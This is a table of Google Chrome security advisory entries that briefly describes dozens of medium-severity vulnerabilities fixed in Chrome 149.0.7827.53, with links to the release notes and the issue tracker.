| Google--Chrome | Race in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11082 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500079715 |
| Google--Chrome | Inappropriate implementation in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11083 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500095743 |
| Google--Chrome | Inappropriate implementation in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11084 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500124500 |
| Google--Chrome | Integer overflow in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11085 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500132379 |
| Google--Chrome | Inappropriate implementation in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11086 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500140111 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11087 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500140149 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11088 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500144879 |
| Google--Chrome | Uninitialized Use in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11089 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500154880 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11090 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500161302 |
| Google--Chrome | Inappropriate implementation in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11091 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500162791 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to perform privilege escalation via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11092 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500170887 |
| Google--Chrome | Inappropriate implementation in Printing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11093 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500172365 |
| Google--Chrome | Use after free in Codecs in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11094 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500174874 |
| Google--Chrome | Insufficient validation of untrusted input in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11095 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500293394 |
| Google--Chrome | Out of bounds read in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11096 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500296311 |
| Google--Chrome | Inappropriate implementation in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11097 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500311718 |
| Google--Chrome | Insufficient validation of untrusted input in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11098 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500315455 |
| Google--Chrome | Use after free in File Input in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11100 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500416901 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11101 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500443031 |
| Google--Chrome | Inappropriate implementation in Isolated Web Apps in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11102 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500468338 |
| Google--Chrome | Inappropriate implementation in Installer in Google Chrome on Windows prior to 149.0.7827.53 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11103 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500483038 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11104 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500501226 |
| Google--Chrome | Insufficient validation of untrusted input in WebUI in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11105 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500505339 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11106 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500508725 |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11107 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500510384 |
| Google--Chrome | Inappropriate implementation in NFC in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform privilege escalation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11108 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500517053 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11109 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500524833 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11110 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500528864 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11111 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500530720 |
| Google--Chrome | Insufficient validation of untrusted input in Chromoting in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11112 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500541413 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11113 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500560764 |
| Google--Chrome | Use after free in Device Trust in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11114 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501360342 |
| Google--Chrome | Use after free in Updater in Google Chrome on Windows prior to 149.0.7827.53 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11115 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501370283 |
| Google--Chrome | Use after free in Chromoting in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11116 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501376612 |
| Google--Chrome | Use after free in Views in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11117 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501403820 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11118 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501424047 |
| Google--Chrome | Inappropriate implementation in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11119 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501461853 |
| Google--Chrome | Insufficient validation of untrusted input in Enterprise Reporting in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11120 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501467566 |
| Google--Chrome | Insufficient validation of untrusted input in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11121 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501483855 |
| Google--Chrome | Inappropriate implementation in Keyboard in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11122 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501485453 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11123 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501505198 |
| Google--Chrome | Integer overflow in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11124 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501511299 |
| Google--Chrome | Use after free in Compositing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11125 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501517520 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11126 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501528031 |
| Google--Chrome | Inappropriate implementation in WebAPKs in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted WebAPK. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11127 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501535295 |
| Google--Chrome | Inappropriate implementation in Web Share in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11128 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501541341 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11129 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501541962 |
| Google--Chrome | Use after free in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11130 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501546443 |
| Google--Chrome | Use after free in Autofill in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11131 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501561644 |
| Google--Chrome | Insufficient policy enforcement in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11132 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501597365 |
| Google--Chrome | Insufficient policy enforcement in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11133 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501606085 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11134 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501640084 |
| Google--Chrome | Insufficient policy enforcement in Autofill in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11135 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501644835 |
| Google--Chrome | Use after free in Canvas in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11136 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501646327 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11137 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501647943 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11138 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501650354 |
| Google--Chrome | Inappropriate implementation in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11139 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501650594 |
| Google--Chrome | Out of bounds read in Chromecast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11140 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501659253 |
| Google--Chrome | Uninitialized Use in Audio in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11141 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501667839 |
| Google--Chrome | Insufficient policy enforcement in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11142 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501668745 |
| Google--Chrome | Out of bounds read in Extensions in Google Chrome on Linux prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from process memory via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11143 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501674219 |
| Google--Chrome | Use after free in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted video file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11144 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501676175 |
| Google--Chrome | Race in Geolocation in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11145 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501683745 |
| Google--Chrome | Insufficient validation of untrusted input in Chromoting in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11146 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501709220 |
| Google--Chrome | Use after free in WebML in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11147 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501731689 |
| Google--Chrome | Inappropriate implementation in Payments in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11148 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501738451 |
| Google--Chrome | Insufficient validation of untrusted input in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11149 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501739206 |
| Google--Chrome | Inappropriate implementation in XML in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11150 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501740299 |
| Google--Chrome | Insufficient validation of untrusted input in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11151 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501740323 |
| Google--Chrome | Object lifecycle issue in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11152 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501762953 |
| Google--Chrome | Side-channel information leakage in Forms in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11153 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501779840 |
| Google--Chrome | Use after free in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11154 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501789156 |
| Google--Chrome | Inappropriate implementation in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11155 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501801823 |
| Google--Chrome | Inappropriate implementation in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11156 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501810226 |
| Google--Chrome | Script injection in Accessibility in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to inject arbitrary scripts or HTML (UXSS) via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11157 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501823385 |
| Google--Chrome | Insufficient validation of untrusted input in Downloads in Google Chrome on Mac prior to 149.0.7827.53 allowed a local attacker to potentially perform a sandbox escape via a crafted AppleScript command. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11158 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501844153 |
| Google--Chrome | Uninitialized Use in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11159 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501861921 |
| Google--Chrome | Out of bounds read in Input in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11160 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501862016 |
| Google--Chrome | Inappropriate implementation in DataTransfer in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11161 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501920294 |
| Google--Chrome | Inappropriate implementation in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11162 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502035074 |
| Google--Chrome | Use after free in Messages in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11163 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502072755 |
| Google--Chrome | Use after free in Blink in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11164 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502089411 |
| Google--Chrome | Use after free in WebMIDI in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11165 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502099949 |
| Google--Chrome | Inappropriate implementation in SVG in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11166 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502118936 |
| Google--Chrome | Inappropriate implementation in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11167 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502228856 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11168 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502256049 |
